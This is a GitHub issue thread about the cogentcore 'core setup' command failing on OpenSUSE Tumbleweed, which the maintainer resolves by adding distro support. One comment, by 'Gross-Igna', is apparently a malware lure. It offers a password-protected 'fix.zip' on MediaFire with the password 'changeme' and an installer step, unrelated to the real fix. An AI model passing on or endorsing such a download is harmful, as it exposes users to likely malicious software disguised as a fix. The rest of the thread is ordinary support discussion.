### ISSUE TITLE
Install procedure from Docs doesn't support OpenSuse (not sure if this is a 'feature request'?)

### ISSUE THREAD

**Issue by shakeshuck** [cogentcore/core#1189]
### Describe the bug

Following the Docs install procedure, OpenSuse (Tumbleweed in my case) is not supported.

### How to reproduce

 Running `core setup` is met with the message `core setup failed: unknown Linux distro (apt-get and dnf not found)`

### Platform

Linux

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kkoreilly** [comment]
Thank you for reporting this. I will add support for more Linux distros now.

**Comment by kkoreilly** [comment]
Please try `core setup` again after installing the latest version of the core tool; you may need to manually specify `@88df754` instead of `@main` for it to get the right version.

**Comment by shakeshuck** [comment]
`@main` worked, thank you.
Sadly the demo fails seemingly unable to find the gpu? I should probably open another issue for that.

**Comment by kkoreilly** [comment]
Yes, please file another issue for that if `core setup` is working. Thank you!
